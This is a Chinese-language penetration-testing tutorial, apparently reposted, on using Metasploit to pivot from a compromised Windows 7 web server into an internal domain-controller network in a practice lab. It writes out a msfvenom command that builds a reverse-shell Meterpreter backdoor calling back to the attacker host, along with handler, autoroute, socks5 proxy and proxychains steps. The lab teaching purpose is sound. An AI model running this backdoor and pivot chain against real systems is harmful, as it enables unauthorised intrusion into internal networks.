內網滲透代理之MSF篇


前言

在我們的內網滲透中,我們往往是通過拿下Web服務器的權限,再通過Web服務器做一個跳板來做橫向滲透。我們知道在我們拿下的Web的服務器上做一些橫向滲透是有點困難的,因為在Web這台機器上沒有我們平常滲透常用的一些滲透工具,故橫向滲透非常的困難,假如我們可以直接用我們自己的電腦做攻擊機就可以讓我們在滲透的過程中得心應手。但是我們知道我們想要拿到的服務器在內網之中,我們無法通過互聯網去直接訪問它,這種時候我們又想控制它,我們就需要借助一些代理技術來輔助我們去完成直接控制內網機器的過程。

環境搭建

這里借助一個紅日團隊開源的一個紅隊實戰測試的部分來完成本次環境搭建,靶機下載地址如下:

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

對本靶場環境做出一些修改之后,最終環境如下所示

黑客攻擊機:kali、windows10

網卡IP:192.168.178.128
網卡IP:192.168.178.1

Web服務器:windows7系統

外網網卡IP:192.168.178.133
內網網卡IP:192.168.52.143

域控服務器:windows server 2008系統

網卡IP:192.168.52.138

網絡互通狀況

kali、windows10可以ping通windows7的外網網卡,ping不通內網網卡
windows7可以ping通kali、windows10和windows server 2008
windows server 2008 ping不通windows7、kali和windows10

攻擊過程

首先我們通過windows7開放的Web服務先拿下Web服務器的權限,這里主要寫的是代理的知識,拿Web權限就不在過多闡述。

拿到Web權限之后,我們可以利用msfvenom生成一個后門,然后利用Web權限進行上傳。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.178.128 lport=4444 -f exe >shell.exe

上傳之后在kali上配置監聽,拿服務器權限。

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.178.128

拿到Web服務器權限之后,我們可以通過這個Web服務器的shell來做一些內網上的滲透,但是我如果想直接通過我們kali攻擊機去訪問到windwos server 2008我們該怎么去做呢。我們知道我們的kali是無法ping通windwos server 2008,因為windwos server 2008它是不出網的,想要訪問到windwos server 2008這里就要借助一些代理知識來輔助我們了。

本篇我們先借助MSF來實現代理功能

在拿到meterpreter權限之后,我們可以使用如下命令來查看一下網絡中的路由信息

meterpreter > run get_local_subnets

我們kali所屬的網段是192.168.178.0的網段,這里還有一個192.168.52.0的網段,所以這時我們就可以利用MSF中的掃描模塊對52網段進行一波掃描實現主機發現,這里我們根據上文環境搭建部分,已經知道內網中還存在一台192.168.52.138 IP的windwos server 2008。

那么我們可以在這里添加一條指向52網段的路由,如下。

meterpreter > run autoroute -s 192.168.52.0/255.255.255.0

然后使用如下命令查看session中的路由。

meterpreter > run autoroute -p

在session存在路由了之后,我們可以使用一個代理socks的代理模塊

msf5 exploit(multi/handler) > use auxiliary/server/socks5
msf5 auxiliary(server/socks5) > set srvhost 192.168.178.128  #本處設置IP為kali攻擊機IP

配置好了socks代理,我們可以借助一款kali上自帶的全局代理軟件proxychains來連接socks代理

首先我們對proxychains代理軟件進行配置

vim /etc/proxychains.conf

在末尾添加socks代理的映射關系(且與在MSF上配置的相對應)

配置好之后,我們就可以通過proxychains來訪問到內網中的windwos server 2008這台服務器了。

如此,我們就還可以生成一個正向的木馬,然后通過一些漏洞上傳到windwos server 2008上,再利用proxychains來啟動MSF配置監聽,來達到利用kali接受到內網中windows server 2008這台服務器的shell。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM